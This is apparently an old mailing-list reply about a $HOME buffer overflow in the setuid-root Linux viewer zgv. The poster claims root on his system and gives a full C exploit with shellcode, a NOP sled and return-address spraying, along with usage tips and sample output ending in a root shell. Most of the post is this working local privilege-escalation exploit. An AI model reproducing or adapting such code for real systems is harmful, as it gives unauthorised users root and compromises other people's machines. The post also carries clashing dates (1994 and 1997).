Re: your mail

[bryan () SCOTT NET (Bryan P. Self)]

On Sun, 2 Jan 1994, Compte de developpement wrote:

> zgv/svgalib "vulnerability" ?
> i dont really see where the problem with zgv/svgalib is.
>
> There is obviously a buffer overflow with the $HOME
> environment variable, but all my attemps to exploit
> this failed: svgalib had well dropped root perms
> (see below). Any idea ?

 I got root on my Redhat system by exploiting zgv last night:

 $ uname -a
 Linux fluffy 2.0.18 #8 Sat May 17 12:30:14 CDT 1997 i586
 $ cc -o n n.c
 $ ./n
 Oak driver: Unknown chipset (id =  0)
 bash#

 Here is the exploit I used. You may have to play with the
 offset a little....

        Some please confirm that this works on
        other Linux system besides just mine :-)
/*
 *
 * zgv exploit coded by BeastMaster V on June 20, 1997
 *
 * USAGE:
 *   For some strage reason, the filename length of this
 *   particular exploit must me one character long, otherwise you
 *   will be dropped into a normal unpriviledged shell. Go Figure....
 *   Try increasing the offest by increments of 10 if you get
 *   an Illegal Instruction or Segmentation Fault.
 *
 *   $ cp zgv_exploit.c n.c
 *   $ cc -o n n.c
 *   $ ./n
 *   Oak driver: Unknown chipset (id =  0)
 *   bash#
 *
 * EXPLANATION: zgv (suid root) does not check bounds for $HOME env.
 * TEMPORARY FIX:  chmod u-s /usr/bin/zgv
 * NOTE: Don't forget to visit http://www.rootshell.com for more exploits.
 * DISCLAIMER: Please use this in a responsible manner.
 *
 */

#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>

char *shellcode =
  "\x31\xc0\xb0\x31\xcd\x80\x93\x31\xc0\xb0\x17\xcd\x80\x68\x59\x58\xff\xe1"
  "\xff\xd4\x31\xc0\x99\x89\xcf\xb0\x2e\x40\xae\x75\xfd\x89\x39\x89\x51\x04"
  "\x89\xfb\x40\xae\x75\xfd\x88\x57\xff\xb0\x0b\xcd\x80\x31\xc0\x40\x31\xdb"
  "\xcd\x80/"
  "/bin/sh"
  "0";

char *get_sp() {
   asm("movl %esp,%eax");
}

#define bufsize 4096
char buffer[bufsize];

main() {
  int i;

  for (i = 0; i < bufsize - 4; i += 4)
    *(char **)&buffer[i] = get_sp() -4675;

  memset(buffer, 0x90, 512);
  memcpy(&buffer[512], shellcode, strlen(shellcode));

  buffer[bufsize - 1] = 0;

  setenv("HOME", buffer, 1);

  execl("/usr/bin/zgv", "/usr/bin/zgv", NULL);
}


                        -bryan